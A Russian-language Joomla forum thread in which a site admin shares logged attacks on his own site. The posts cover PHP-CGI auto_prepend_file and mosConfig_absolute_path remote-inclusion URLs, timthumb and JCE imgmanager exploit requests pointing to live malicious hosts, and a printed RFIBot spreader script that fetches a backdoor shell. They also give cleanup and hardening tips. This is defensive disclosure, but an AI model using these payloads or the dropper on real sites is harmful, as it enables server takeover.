Это форк Vinaora Nivo Slider, пришлось переименовать, в силу требования JED. Даже старую версию качать можно было только с варезных сайтов, нашпигованную троянами. Зачем оно такое, согласитесь.
http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt
http://masterpro.ws/?-d+safe_mode=Off+-d+disable_functions=NULL+-d+allow_url_fopen=On+-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt+-n
http://masterpro.ws/?-d+allow_url_include=1+-d+auto_prepend_file=http://florbella.com.br/so.txt
http://www.masterpro.ws/wp-content/themes/eStore/timthumb.php?src=http://picasa.com.rnt.ca/bat.php
http://www.masterpro.ws/forum//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php
http://www.masterpro.ws/forum&sa=U&ei=THucUo71L8igtAaC8YCACA&ved=0CJABEBYwFjjIAQ&usg=AFQjCNFc40vYLvdtMx_iyBKU9-St1kri2A//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php
http://www.masterpro.ws/forum/virtuemart//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://picasa.com.buscadordetrabajo.es/cybercrime.php
http://www.masterpro.ws/forum/virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.grxuy.com/vv??
http://www.masterpro.ws//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://caoc.cat/idr??
В последнее время участились случаи взлома сайтов на Joomla, использующих компонент Joomla Content Editor (com_jce).
Этот компонент имеет уязвимость вплоть до версии 2.0.10, которая позволяет злоумышленнику загружать на сайт произвольные файлы, в том числе, скрипты php.
Для заражения злоумышленники используют робота, который сканирует сайты на предмет наличия компонента jce и имеющейся в нём уязвимости. Наиболее часто встречающиеся симптомы такого заражения:
файлы wp-conf.php в корневой директории сайта ./public_html и в корневой директории аккаунта
файл со случайным названием вида w7792289n.php в ./public_html
многочисленные файлы index.php, залитые в случайные директории сайта
файлы с произвольным названием, в т.ч. с вполне осмысленным, залитые в случайные директории сайта.
Модификация файлов сайта в этом случае не производится, и зловредные файлы легко вычислить по дате изменения. Например, если взлом был осуществлён неделю назад, и если за эту неделю на сайте не менялись php-скрипты, то лечение сводится к следующей команде:
cd public_html
find . -type f -mtime -7 -name "*.php" -delete
Для предотвращения повторного взлома через эту уязвимость следует обновить компонент JCE.
<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"];
$url = 'http://amaecs.com/v/'; //URL path
$src = $url.'com'; //Source Shell
$shell = 'null.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot
##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
}
if(!copy($src,$exec)){
die(base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Failed!');
}
else {
echo base64_decode('TVEgU2hlbGx6Og==').' '.$exec.' Created!';
}
break;
}
?>
</body></html>
<?php die(); ?>
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
http://www.istanbuldenizotobusu.com/update.php
http://picasa.com.deeppowdersnowrider.com/smunfals.php
http://www.grxuy.com/vv??&Itemid=144&option=com_kunena&catid=42&view=category&defaultmenu=145&layout=administrator
http://florbella.com.br/so.txt&option=com_content&view=article&id=1&Itemid=102
http://www.istanbuldenizotobusu.com/update.php&Itemid=144&view=index.php&defaultmenu=145&layout=default
http://ventaspor.com/wp-includes/php/update.php&Itemid=102&view=article&id=0
http://picasa.com.kennethholland.com/bad.php&Itemid=
http://picasa.com.buscadordetrabajo.es/cybercrime.php&Itemid=144&catid=21&view=topic&defaultmenu=145&id=4310&layout=index.php
http://www.basiakonkel.nl/included/php/content/update.php&Itemid=163&option=com_k2&view=item&layout=item&id=21
http://www.zilliontreinamentos.com.br/site/wp-content/php/update.php&Itemid=144&catid=26&view=category&defaultmenu=145&layout=index.php
http://picasa.com.allforbikers.com/seo.php&Itemid=102&option=com_content&view=category&id=0
http://flickr.com.newwybarbie.com/bad.php&Itemid=144&option=com_kunena&catid=26&view=category&defaultmenu=145&wp=file-uploader&layout=themes
http://wordpress.com.seomexicali.com/coreunix.php&Itemid=144&option=com_kunena&catid=25&view=category&defaultmenu=145&wp=content&layout=themes
http://img.youtube.com.gracielascelebraciones.com/myluph.php&Itemid=144&option=com_kunena&catid=25&view=category&defaultmenu=145&wp=content&layout=themes
http://www.basiakonkel.nl/included/php/content/update.php&Itemid=102&view=article&id=0
http://picasa.com.aguiarindustria.com.br/InjectorThimThumb.php&Itemid=102&option=com_content&view=category&id=0
http://gruene-amelinghausen.de/idsjceq//petx.php&Itemid=102&option=com_content&view=article&id=0
http://narmafzar24.ir/update.php&Itemid=144&catid=26&view=category&defaultmenu=145&layout=index.php
http://biberburg-semlin.de/bad.php&Itemid=102&option=com_content&view=category&id=0
http://kpu.cirebonkab.go.id/wp-content/themes/kreview/img/license.php&Itemid=144&view=index.php&defaultmenu=145&layout=default
http://stage-secrets-management.com/includes/php/update.php
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Aleksej пишет: Вашему вниманию - статья Внимание, хакерские атаки в вебе .
open_basedir=/путь к каталогу tmp/
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
beginner пишет: Не вполне понятно как правильно прописать open_basedir...
open_basedir=/path/to/your/root_folder;/path/to/your/temp_folder;/path/to/your/additional_folder
open_basedir=/path/to/your/root_folder:/path/to/your/temp_folder:/path/to/your/additional_folder
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
http://www.masterpro.ws/component/mailto/%3ftmpl=component%26template=jsn_epic_pro%26link=db87c931bb7a536acabfcd10017daed6400d8acf//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php
http://masterpro.ws/forum/25-bezopasnost-sajta-na-joomla/4549-kak-vzlamyvali-masterpro-ws&sa=U&ei=0pPeUuCDFYbOyAGrj4DgCg&ved=0CMUBEBYwJg&usg=AFQjCNHPknpVA9obE1QT0XBxBHTGI9UGdA//wp-content//themes/eStore/timthumb.php?src=http://wordpress.com.xxxvideos.cc/wp-force.php
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
beginner пишет: не боитесь, что на самом деле ломанут сайт?
http://masterpro.ws//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://stage-secrets-management.com/includes/php/update.php
http://www.masterpro.ws/component/mailto//index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20?src=http://www.istanbuldenizotobusu.com/update.php
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.
savage пишет: Гы, рад видеть, что тебя еще пока не взломали, aleksej. Не всем так везет, вот у моего работодателя пару сайтов ломанули недавно.
http://woutermesker.nl/nicole/wp-content/php/update.php
http://futterlager.at/modules/mod_jce/joomla.php
http://picasa.com.blackwellbusiness.com/bad.php
http://www.escorindo.com/images/demo.php
http://prometals.co.za/update.php
http://www.atlantahometheatresystems.com/wp-includes/images/id.flv???
http://woutermesker.nl/nicole/wp-content/php/update.php
http://picasa.com.kisahnyata.net/up.php
http://picasa.com.abrivshops.com/ThimThumb.php
http://www.basiakonkel.nl/included/php/content/update.php
http://www.rc-roethis.at/rc/php/joomla.php
Пожалуйста Войти или Регистрация, чтобы присоединиться к беседе.